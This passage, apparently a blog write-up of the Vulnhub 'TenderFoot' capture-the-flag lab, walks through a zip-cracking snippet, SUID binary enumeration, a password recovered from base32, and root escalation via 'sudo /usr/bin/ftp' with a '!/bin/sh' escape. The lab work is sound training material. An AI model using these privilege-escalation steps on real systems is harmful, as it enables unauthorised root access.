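    print(crack_zip(archive, ["password", "123456", "h4ck3d", "letmein"]))
```

For a real archive, replace the fixture with `open("gift.zip", "rb").read()` and iterate over rockyou.txt; the per-guess cost is dominated by Python overhead rather than the cipher, which is the whole point of john's optimised PKZIP format.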
monica@TenderFoot:/var/www/html/fotocd$ find / -perm -4000 -type f 2>/dev/null
/bin/ping6
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/opt/exec/chandler
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/netkit-ftp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/chfn
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
monica@TenderFoot:/var/www/html/fotocd$ /opt/exec/chandler
chandler@TenderFoot:/var/www/html/fotocd$ id
uid=1000(chandler) gid=1000(chandler) groups=1000(chandler),1001(monica)
chandler@TenderFoot:/var/www/html/fotocd$ 

As the hint suggested, executing the SUID binary /opt/exec/chandler drops into a shell as chandler (uid 1000; note the supplementary group 1001(monica) carried over from the calling process).

chandler@TenderFoot:/home/chandler$ ls
note.txt
chandler@TenderFoot:/home/chandler$ cat note.txt 


go to root folder and grab your final flag :)

chandler@TenderFoot:/tmp$ 
chandler@TenderFoot:/tmp$ cd /home
chandler@TenderFoot:/home$ ls -alh
total 16K
drwxr-xr-x  4 root     root     4.0K Oct  4  2020 .
drwxr-xr-x 23 root     root     4.0K Oct  4  2020 ..
drwxr-xr-x  4 chandler chandler 4.0K Oct  4  2020 chandler
drwxr-xr-x  4 monica   monica   4.0K Oct  4  2020 monica
chandler@TenderFoot:/home$ cd chandler/
chandler@TenderFoot:/home/chandler$ ls -alh
total 36K
drwxr-xr-x 4 chandler chandler 4.0K Oct  4  2020 .
drwxr-xr-x 4 root     root     4.0K Oct  4  2020 ..
-rw------- 1 chandler chandler    8 Oct  4  2020 .bash_history
-rw-r--r-- 1 chandler chandler  220 Oct  4  2020 .bash_logout
-rw-r--r-- 1 chandler chandler 3.7K Oct  4  2020 .bashrc
drwx------ 2 chandler chandler 4.0K Oct  4  2020 .cache
drwxrwxr-x 2 chandler chandler 4.0K Oct  4  2020 .nano
-rw-r--r-- 1 root     root       48 Oct  4  2020 note.txt
-rw-r--r-- 1 chandler chandler  655 Oct  4  2020 .profile
-rw-r--r-- 1 chandler chandler    0 Oct  4  2020 .sudo_as_admin_successful
chandler@TenderFoot:/home/chandler$ cd .cache
chandler@TenderFoot:/home/chandler/.cache$ ls -alh
total 16K
drwx------ 2 chandler chandler 4.0K Oct  4  2020 .
drwxr-xr-x 4 chandler chandler 4.0K Oct  4  2020 ..
-rw-r--r-- 1 chandler chandler    0 Oct  4  2020 motd.legal-displayed
-rw-r--r-- 1 root     root      655 Oct  4  2020 note.txt
-rw-r--r-- 1 root     root      775 Oct  4  2020 user2.txt
chandler@TenderFoot:/home/chandler/.cache$ cat user2.txt 


 ██████╗ ██████╗  ██████╗ ██╗     ██╗
██╔════╝██╔═████╗██╔═████╗██║     ██║
██║     ██║██╔██║██║██╔██║██║     ██║
██║     ████╔╝██║████╔╝██║██║     ╚═╝
╚██████╗╚██████╔╝╚██████╔╝███████╗██╗
 ╚═════╝ ╚═════╝  ╚═════╝ ╚══════╝╚═╝
                                     

===================================
Great You got your 2nd Flag too! :)

You are one step away from root!
===================================
chandler@TenderFoot:/home/chandler/.cache$ cat note.txt 
================================================================================

If you have reach till here, congrats you solved 90% of the B0X!

Now your next task is to get root shell! , for that i use binary

like previously you did to get chandler's shell. Same you have to do 

difference is monica can not run sudo commands but chandler can run sudo 

commands. I'll give you a master key, this may be help you somewhere :)

When you found SUID/binary then search how to get root shell by this binary
GTFOBins may help you.

KEY --> OBQXG43XMQ5FSMDVINZDIY3LJUZQ====


The key is base32 too (same alphabet and "====" padding as the /hint blob); CyberChef decodes it to passwd:Y0uCr4ckM3, so the password is:

Y0uCr4ckM3

Then log in over SSH as chandler:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ssh chandler@192.168.56.239
chandler@192.168.56.239's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


39 packages can be updated.
26 updates are security updates.


Last login: Sun Oct  4 18:48:22 2020 from 10.0.2.60
chandler@TenderFoot:~$ sudo -l
Matching Defaults entries for chandler on TenderFoot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User chandler may run the following commands on TenderFoot:
    (root) NOPASSWD: /usr/bin/ftp
chandler@TenderFoot:~$ sudo /usr/bin/ftp
ftp> !/bin/sh
# cd /root
# ls -alh
total 32K
drwx------  4 root root 4.0K Oct  4  2020 .
drwxr-xr-x 23 root root 4.0K Oct  4  2020 ..
-rw-------  1 root root    0 Oct  4  2020 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K Oct  4  2020 .cache
-rw-r--r--  1 root root  708 Oct  4  2020 last_note.txt
drwxr-xr-x  2 root root 4.0K Oct  4  2020 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 1.4K Oct  4  2020 proof.txt
# cat proof.txt


**************************************************************************************************************
'########:'########:'##::: ##:'########::'########:'########::'########::'#######:::'#######::'########:'####:*
... ##..:: ##.....:: ###:: ##: ##.... ##: ##.....:: ##.... ##: ##.....::'##.... ##:'##.... ##:... ##..:: ####:*
::: ##:::: ##::::::: ####: ##: ##:::: ##: ##::::::: ##:::: ##: ##::::::: ##:::: ##: ##:::: ##:::: ##:::: ####:*
::: ##:::: ######::: ## ## ##: ##:::: ##: ######::: ########:: ######::: ##:::: ##: ##:::: ##:::: ##::::: ##::*
::: ##:::: ##...:::: ##. ####: ##:::: ##: ##...:::: ##.. ##::: ##...:::: ##:::: ##: ##:::: ##:::: ##:::::..:::*
::: ##:::: ##::::::: ##:. ###: ##:::: ##: ##::::::: ##::. ##:: ##::::::: ##:::: ##: ##:::: ##:::: ##::::'####:*
::: ##:::: ########: ##::. ##: ########:: ########: ##:::. ##: ##:::::::. #######::. #######::::: ##:::: ####:*
:::..:::::........::..::::..::........:::........::..:::::..::..:::::::::.......::::.......::::::..:::::....::*
*************************************************************************************************************


Congratulations! you found last flag of tenderfoot :)
I'll be glad if you take screenshot of this and give me feedback on,

Twitter --> (@_Anant_chauhan)
Discord --> (infinity_#9175)
Linkedin --> (https://www.linkedin.com/in/anant-chauhan-a07b2419b)


# 

Lessons learned

  1. When the author says "enumerate more" during directory scanning, the answer is more or bigger wordlists (and more file extensions), not a different line of attack;

  2. Running /opt/exec/chandler did give me a chandler shell, but sudo -l from that shell told me the user was not in sudoers, which was odd; I had to log in as chandler over SSH separately.

  3. This box can be solved essentially by following the author's hints step by step.

Posted 2022-11-29 22:46 by Jason_huawen